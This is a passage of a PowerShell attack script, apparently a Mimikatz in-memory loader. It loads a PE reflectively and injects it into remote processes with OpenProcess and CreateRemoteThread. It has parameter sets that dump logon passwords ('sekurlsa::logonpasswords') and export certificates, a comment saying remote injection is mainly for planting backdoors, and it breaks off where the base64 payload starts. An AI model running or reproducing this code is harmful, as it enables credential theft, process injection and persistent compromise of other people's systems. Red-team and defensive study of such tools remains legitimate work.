  2400.             $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
  2401.             if ($Success -eq $false)
  2402.             {
  2403.                 Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
  2404.             }
  2405.         }
  2406.        
  2407.        
  2408.         Function Main
  2409.         {
  2410.             $Win32Functions = Get-Win32Functions
  2411.             $Win32Types = Get-Win32Types
  2412.             $Win32Constants = Get-Win32Constants
  2413.            
  2414.             $RemoteProcHandle = [IntPtr]::Zero
  2415.            
  2416.             #If a remote process to inject in to is specified, get a handle to it
  2417.             if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
  2418.             {
  2419.                 Throw "Can't supply a ProcId and ProcName, choose one or the other"
  2420.             }
  2421.             elseif ($ProcName -ne $null -and $ProcName -ne "")
  2422.             {
  2423.                 $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
  2424.                 if ($Processes.Count -eq 0)
  2425.                 {
  2426.                     Throw "Can't find process $ProcName"
  2427.                 }
  2428.                 elseif ($Processes.Count -gt 1)
  2429.                 {
  2430.                     $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
  2431.                     Write-Output $ProcInfo
  2432.                     Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
  2433.                 }
  2434.                 else
  2435.                 {
  2436.                     $ProcId = $Processes[0].ID
  2437.                 }
  2438.             }
  2439.            
  2440.             #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.
  2441.             #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege
  2442.             #       if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)
  2443.             #       {
  2444.             #           Write-Verbose "Getting SeDebugPrivilege"
  2445.             #           Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
  2446.             #       }  
  2447.            
  2448.             if (($ProcId -ne $null) -and ($ProcId -ne 0))
  2449.             {
  2450.                 $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
  2451.                 if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2452.                 {
  2453.                     Throw "Couldn't obtain the handle for process ID: $ProcId"
  2454.                 }
  2455.                
  2456.                 Write-Verbose "Got the handle for the remote process to inject in to"
  2457.             }
  2458.            
  2459.            
  2460.             #Load the PE reflectively
  2461.             Write-Verbose "Calling Invoke-MemoryLoadLibrary"
  2462.            
  2463.             try
  2464.             {
  2465.                 $Processors = Get-WmiObject -Class Win32_Processor
  2466.             }
  2467.             catch
  2468.             {
  2469.                 throw ($_.Exception)
  2470.             }
  2471.            
  2472.             if ($Processors -is [array])
  2473.             {
  2474.                 $Processor = $Processors[0]
  2475.             }
  2476.             else
  2477.             {
  2478.                 $Processor = $Processors
  2479.             }
  2480.            
  2481.             if (($Processor.AddressWidth) -ne (([System.IntPtr]::Size) * 8))
  2482.             {
  2483.                 Write-Verbose ("Architecture: " + $Processor.AddressWidth + " Process: " + ([System.IntPtr]::Size * 8))
  2484.                 Write-Error "PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." -ErrorAction Stop
  2485.             }
  2486.            
  2487.             #Determine whether or not to use 32bit or 64bit bytes
  2488.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)
  2489.             {
  2490.                 [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)
  2491.             }
  2492.             else
  2493.             {
  2494.                 [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
  2495.             }
  2496.             $PEBytes[0] = 0
  2497.             $PEBytes[1] = 0
  2498.             $PEHandle = [IntPtr]::Zero
  2499.             if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2500.             {
  2501.                 $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
  2502.             }
  2503.             else
  2504.             {
  2505.                 $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
  2506.             }
  2507.             if ($PELoadedInfo -eq [IntPtr]::Zero)
  2508.             {
  2509.                 Throw "Unable to load PE, handle returned is NULL"
  2510.             }
  2511.            
  2512.             $PEHandle = $PELoadedInfo[0]
  2513.             $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process
  2514.            
  2515.            
  2516.             #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.
  2517.             $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  2518.             if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
  2519.             {
  2520.                 #########################################
  2521.                 ### YOUR CODE GOES HERE
  2522.                 #########################################
  2523.                 Write-Verbose "Calling function with WString return type"
  2524.                 [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_GardeRat"
  2525.                 if ($WStringFuncAddr -eq [IntPtr]::Zero)
  2526.                 {
  2527.                     Throw "Couldn't find function address."
  2528.                 }
  2529.                 $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])
  2530.                 $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
  2531.                 $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)
  2532.                 [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)
  2533.                 [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)
  2534.                 if ($OutputPtr -eq [IntPtr]::Zero)
  2535.                 {
  2536.                     Throw "Unable to get output, Output Ptr is NULL"
  2537.                 }
  2538.                 else
  2539.                 {
  2540.                     $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
  2541.                     Write-Output $Output
  2542.                     $Win32Functions.LocalFree.Invoke($OutputPtr);
  2543.                 }
  2544.                 #########################################
  2545.                 ### END OF YOUR CODE
  2546.                 #########################################
  2547.             }
  2548.             #For remote DLL injection, call a void function which takes no parameters
  2549.             elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  2550.             {
  2551.                 $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
  2552.                 if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
  2553.                 {
  2554.                     Throw "VoidFunc couldn't be found in the DLL"
  2555.                 }
  2556.                
  2557.                 $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
  2558.                 $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
  2559.                
  2560.                 #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors
  2561.                 $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
  2562.             }
  2563.            
  2564.             #Don't free a library if it is injected in a remote process
  2565.             if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2566.             {
  2567.                 Invoke-MemoryFreeLibrary -PEHandle $PEHandle
  2568.             }
  2569.             else
  2570.             {
  2571.                 #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process
  2572.                 $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
  2573.                 if ($Success -eq $false)
  2574.                 {
  2575.                     Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
  2576.                 }
  2577.             }
  2578.            
  2579.             Write-Verbose "Done!"
  2580.         }
  2581.        
  2582.         Main
  2583.     }
  2584.    
  2585.     #Main function to either run the script locally or remotely
  2586.     Function Main
  2587.     {
  2588.         if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
  2589.         {
  2590.             $DebugPreference = "Continue"
  2591.         }
  2592.        
  2593.         Write-Verbose "PowerShell ProcessID: $PID"
  2594.        
  2595.        
  2596.         if ($PsCmdlet.ParameterSetName -ieq "DumpCreds")
  2597.         {
  2598.             $ExeArgs = "sekurlsa::logonpasswords exit"
  2599.         }
  2600.         elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts")
  2601.         {
  2602.             $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit"
  2603.         }
  2604.         else
  2605.         {
  2606.             $ExeArgs = $Command
  2607.         }
  2608.        
  2609.         [System.IO.Directory]::SetCurrentDirectory($pwd)
  2610.        
  2611.         # 2.1 (x64) 20161029 OJ Edition!
  2612.         # SHA256 hash: C36572664731F058A282FA6F943E48FE80646F6613C3A46F3EEE1F4A121B2158
  2613.         # VirusTotal Analysis: https://www.virustotal.com/en/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/analysis/1478821040/
  2614.         $PEBytes64 = '